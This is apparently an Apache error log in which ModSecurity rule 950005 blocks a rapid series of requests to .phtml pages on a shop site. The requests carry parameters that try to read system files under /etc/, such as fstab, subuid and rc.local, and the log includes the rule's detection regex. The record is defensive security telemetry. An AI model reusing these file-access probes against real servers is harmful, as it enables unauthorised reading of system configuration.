[Thu Mar 19 13:22:53.916025 2026] [:error] [pid 26799:tid 140411548894976] [client 57.141.18.53:50240] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3da6ubjKNq_cu4Zp1QAAA1c"]
[Thu Mar 19 13:22:54.178425 2026] [:error] [pid 14269:tid 140411590858496] [client 57.141.18.29:50246] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3gbLMZ6AikZjR9VwkwAAABI"]
[Thu Mar 19 13:22:54.589874 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.65:50252] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3gbLMZ6AikZjR9VwlAAAAAE"]
[Thu Mar 19 13:22:55.057899 2026] [:error] [pid 27403:tid 140411565680384] [client 57.141.18.2:50264] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3xkFeYa1D6dYQnAESQAAAdU"]
[Thu Mar 19 13:22:55.498896 2026] [:error] [pid 14269:tid 140411632822016] [client 57.141.18.10:50274] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3wbLMZ6AikZjR9VwlgAAAA0"]
[Thu Mar 19 13:22:55.659901 2026] [:error] [pid 14269:tid 140411607643904] [client 57.141.18.115:50276] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3wbLMZ6AikZjR9VwlwAAABA"]
[Thu Mar 19 13:22:55.851252 2026] [:error] [pid 14269:tid 140411716749056] [client 57.141.18.108:50290] [client 57.141.18.108] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dnsmasq.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3wbLMZ6AikZjR9VwmQAAAAM"]
[Thu Mar 19 13:22:56.643199 2026] [:error] [pid 14269:tid 140411691570944] [client 57.141.18.103:50302] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4AbLMZ6AikZjR9VwmgAAAAY"]
[Thu Mar 19 13:22:57.234633 2026] [:error] [pid 17887:tid 140411574073088] [client 57.141.18.50:50326] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4QkwaGbbGflqUZDa1gAAANQ"]
[Thu Mar 19 13:22:57.703675 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.17:50336] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4QbLMZ6AikZjR9VwnQAAABU"]
[Thu Mar 19 13:22:57.705111 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.102:50338] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4QbLMZ6AikZjR9VwngAAABU"]
[Thu Mar 19 13:22:59.614667 2026] [:error] [pid 19093:tid 140411649607424] [client 57.141.18.64:50356] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/percona-server.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4l_V7PWP6ixUYl7PzQAAAos"]
[Thu Mar 19 13:22:59.615853 2026] [:error] [pid 17653:tid 140411666392832] [client 57.141.18.16:50362] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4sdf6f5d65gmYZSMWAAAAsk"]
[Thu Mar 19 13:22:59.617542 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.39:50374] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4-oXxyEfFpUF8f8gCQAAAUI"]
[Thu Mar 19 13:22:59.618084 2026] [:error] [pid 27403:tid 140411540502272] [client 57.141.18.109:50370] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4hkFeYa1D6dYQnAESgAAAdg"]
[Thu Mar 19 13:22:59.619431 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.53:50376] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4wbLMZ6AikZjR9VwnwAAAAE"]
[Thu Mar 19 13:22:59.694134 2026] [:error] [pid 31803:tid 140411624429312] [client 57.141.18.12:50384] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi4-yqAr6etmhZHNpy9gAAAE4"]
[Thu Mar 19 13:23:00.446319 2026] [:error] [pid 26799:tid 140411683178240] [client 57.141.18.103:50392] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5Na6ubjKNq_cu4Zp1wAAA0c"]
[Thu Mar 19 13:23:00.828611 2026] [:error] [pid 30077:tid 140411540502272] [client 57.141.18.87:50398] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5Pu8EFLIOrSqIpu7iQAAAlg"]
[Thu Mar 19 13:23:01.318848 2026] [:error] [pid 26799:tid 140411565680384] [client 57.141.18.13:50410] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5da6ubjKNq_cu4Zp2QAAA1U"]
[Thu Mar 19 13:23:01.581230 2026] [:error] [pid 31803:tid 140411590858496] [client 57.141.18.59:50416] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5eyqAr6etmhZHNpy-AAAAFI"]
[Thu Mar 19 13:23:01.712648 2026] [:error] [pid 27403:tid 140411548894976] [client 57.141.18.37:50424] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5RkFeYa1D6dYQnAESwAAAdc"]
[Thu Mar 19 13:23:02.050556 2026] [:error] [pid 27403:tid 140411590858496] [client 57.141.18.41:50436] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5hkFeYa1D6dYQnAETQAAAdI"]
[Thu Mar 19 13:23:02.216412 2026] [:error] [pid 30077:tid 140411708356352] [client 57.141.18.121:50444] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5vu8EFLIOrSqIpu7igAAAkQ"]
[Thu Mar 19 13:23:02.947974 2026] [:error] [pid 31803:tid 140411548894976] [client 57.141.18.38:50460] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi5uyqAr6etmhZHNpy-QAAAFc"]
[Thu Mar 19 13:23:03.034789 2026] [:error] [pid 17653:tid 140411582465792] [client 57.141.18.83:50462] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi58df6f5d65gmYZSMWQAAAtM"]
[Thu Mar 19 13:23:03.636916 2026] [:error] [pid 31803:tid 140411607643904] [client 57.141.18.115:50472] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwi5-yqAr6etmhZHNpy-gAAAFA"]
[Thu Mar 19 13:23:03.696243 2026] [:error] [pid 19093:tid 140411574073088] [client 57.141.18.53:50474] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi51_V7PWP6ixUYl7PzgAAApQ"]
[Thu Mar 19 13:23:04.049386 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.53:50480] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id 